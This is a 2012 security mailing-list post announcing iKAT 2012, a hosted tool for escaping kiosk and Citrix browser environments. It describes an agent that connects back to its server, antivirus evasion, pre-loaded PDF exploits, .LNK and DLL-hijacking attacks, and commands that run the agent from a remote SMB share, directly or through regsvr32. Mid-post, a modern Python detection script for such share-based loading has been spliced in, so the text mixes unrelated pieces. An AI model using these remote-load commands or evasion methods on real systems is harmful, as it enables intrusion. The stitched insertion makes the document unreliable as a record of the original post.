Date: Sun, 12 Aug 2012 16:05:15 +0800
From: Paul Craig <>
Subject: iKAT 2012 Release - Interactive Kiosk Attack Tool

iKAT 2012 - Interactive Kiosk Attack Tool
            Beating Heart Edition

It is with great pleasure that I would like to release this year's
edition of iKAT - The Interactive Kiosk Attack Tool.

 * to bypass pesky blacklist filters ( also available on https )

Over the last 5 years iKAT has grown in popularity and is now the
de facto standard for conducting penetration tests against
browser environments such as Citrix Terminals, Kiosks, WebTVs and
even in-flight entertainment systems.
iKAT is visited by over 100 confirmed Kiosks or Citrix environments
per day and is currently spawning on average 3 system shells per hour.

iKAT is a 100% free SaaS website that you can visit from any browser
environment. iKAT will attempt to exploit the browser and spawn a
local shell for you.
This year's version has had a major re-work on both the design/layout
and the underlying technology and aims to provide the smoothest, most
fruitful experience yet.
I do hope you all enjoy the sleepless nights and hard work that have
been invested into iKAT 2012.

iKAT 2012 will be officially released and demoed at XCON 2012 in Beijing,
China next week.

New Features of iKAT 2012:

During Defcon 19 I was approached by a sprightly girl with bright red
hair who asked me if I was "that Kiosk guy?"
I replied yes? And she proceeded to abuse my HTML development skills,
and told me that although iKAT is technically a great tool, it
resembles a 12-year-old's WordPress site.
Turns out this sprightly (and inebriated) girl was a web developer, so
I took her name-card and after the conference emailed her and demanded
that since she ridiculed my development skills, she should write me a
new layout for iKAT, for free.
It is with great pleasure that I can say that iKAT is now "nice"
looking, easier to navigate, Web 2.0, and fully W3C compliant!
Big thanks to Melanie Wilke for her donation of both time and effort.

Client / Server Model:
One of the largest technological changes in iKAT is the implementation
of a client/server model.
Kiosk vendors and AV vendors have been quick to blacklist and block my
tools, and the success rate of previous iKAT versions has been
decreasing, so the only approach I found to work was to drop a small
iKAT Agent and connect back to the iKAT server. The iKAT server will do
all of the post-exploitation work for you!
This provides a much higher rate of success as I am able to kill and
evade AV; there is also a much higher chance of not only spawning
shells, but spawning system shells.
Over time the post-exploitation methods will be refined to help you
stay one step ahead.
The iKAT agent has been included in each of the payloads and
exploitation methods so nothing changes in how you use iKAT.

New Tools / Exploits / Bug Fixes:
A raft of new tools and exploits has been developed for iKAT 2012 to
increase the attacks available to you.

These include:
Dynamic In-Memory Process Patching to generically defeat Windows Local
Group Policy
Additional SRP Bypass Techniques
Top #10 PDF exploits pre-loaded with iKAT agents
Available DLL content
Upgraded/Improved/Fixed tools.

New Browser Crashes:
The fuzzing servers have been working overtime finding new
(non-exploitable) crash conditions for popular browsers.
These exploits simply allow you to crash and close a browser, often
leading to the underlying desktop being exposed.
I dubbed this exploit "Emo-Kiosking", and although crashing the
browser may sound crude, it has proven to be the most effective exploit
against controlled browser environments, as the end-goal is to escape
the browser.

Samba Service:
iKAT now contains a world-readable SMB share hosting the iKAT agents
in DLL and EXE form.
Hosted at \\\ikat, this share contains ikat.exe and
ikat.dll and a suite of other tools.
This allows you to simply run \\\ikat\ikat.exe from the
command line to load the iKAT agent.
Alternatively you can regsvr32 \\\ikat\ikat.dll to
complete the same task.
This is incredibly handy when you are able to execute commands, but
cannot download a file.
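A defender-side view of the share-based loading described above: the following is an added example (mine, not code from iKAT or from the original post) that scans constructed process-creation log lines for a binary launched straight off a UNC share, or for regsvr32/rundll32-style binaries pointed at a UNC path. The share host SHARE-HOST and the log format are placeholders, since the post does not give the real hostname.

```python
import re

# Constructed sample process-creation events (simplified Sysmon Event ID 1 style).
# SHARE-HOST is a placeholder: the original post does not name the iKAT share host.
SAMPLE_LOGS = [
    r'Image="C:\Windows\System32\regsvr32.exe" CommandLine="regsvr32 \\SHARE-HOST\ikat\ikat.dll" ParentImage="C:\Windows\System32\cmd.exe"',
    r'Image="\\SHARE-HOST\ikat\ikat.exe" CommandLine="\\SHARE-HOST\ikat\ikat.exe" ParentImage="C:\Program Files\Internet Explorer\iexplore.exe"',
    r'Image="C:\Windows\System32\regsvr32.exe" CommandLine="regsvr32 /s C:\Program Files\Vendor\vendor.dll" ParentImage="C:\Windows\System32\msiexec.exe"',
    r'Image="C:\Windows\System32\notepad.exe" CommandLine="notepad.exe" ParentImage="C:\Windows\explorer.exe"',
]

# \\host\share... anywhere in a string (host and share names stop at whitespace, quote or backslash).
UNC_PATH = re.compile(r'\\\\[^\\\s"]+\\[^\\\s"]+')
# Key="value" pairs as used in the constructed log format above.
FIELD = re.compile(r'(\w+)="([^"]*)"')
# Built-in binaries commonly used to load code from a remote path.
LOLBINS = {"regsvr32.exe", "rundll32.exe", "mshta.exe", "cmd.exe", "powershell.exe"}


def parse_line(line):
    """Turn one Key="value" log line into a dict."""
    return dict(FIELD.findall(line))


def classify(event):
    """Return a finding tag for a suspicious event, or None for benign ones."""
    image = event.get("Image", "")
    cmd = event.get("CommandLine", "")
    exe = image.rsplit("\\", 1)[-1].lower()
    if UNC_PATH.match(image):            # the process image itself lives on a share
        return "exec-from-unc-share"
    if exe in LOLBINS and UNC_PATH.search(cmd):   # e.g. regsvr32 \\host\share\x.dll
        return f"{exe}-loading-unc-path"
    return None


def scan(lines):
    """Scan raw log lines; return (tag, image, parent) for each hit."""
    findings = []
    for line in lines:
        ev = parse_line(line)
        tag = classify(ev)
        if tag:
            findings.append((tag, ev.get("Image"), ev.get("ParentImage")))
    return findings


if __name__ == "__main__":
    for tag, image, parent in scan(SAMPLE_LOGS):
        print(f"{tag}: {image} (parent: {parent})")
```

A local regsvr32 of a vendor DLL (third line) is deliberately left unflagged so the rule keys on the remote path, not on regsvr32 alone.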

Updated PhotoKAT:
PhotoKAT is the lesser-known Photo Kiosk exploitation tool.
This tool should be extracted to a USB Key or Memory Card and plugged
into a Photo Kiosk.
PhotoKAT now attempts many new generic exploits against common Photo
Kiosk terminals.

Attacks include:
.LNK Shortcut Exploit to the iKAT Agent on the iKAT SMB server
DLL Hijacking of common libraries
Malicious PDF Files loaded with iKAT Agents
A suite of iKAT Tools

iKAT is a labor of love, and everything from the hosting, design,
research and exploits is donated by the community.
However, there are some things that cost money, like our code-signing
certificate, and often real cash is required.
If you have ever used iKAT to pop shells on a job, or the project has
helped you in some way - please donate to the cause.
Every dollar helps and will go directly towards fighting the good fight.

My thanks to everyone who has helped the iKAT project over the years;
their names are included on the website.


Paul Craig

Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia -
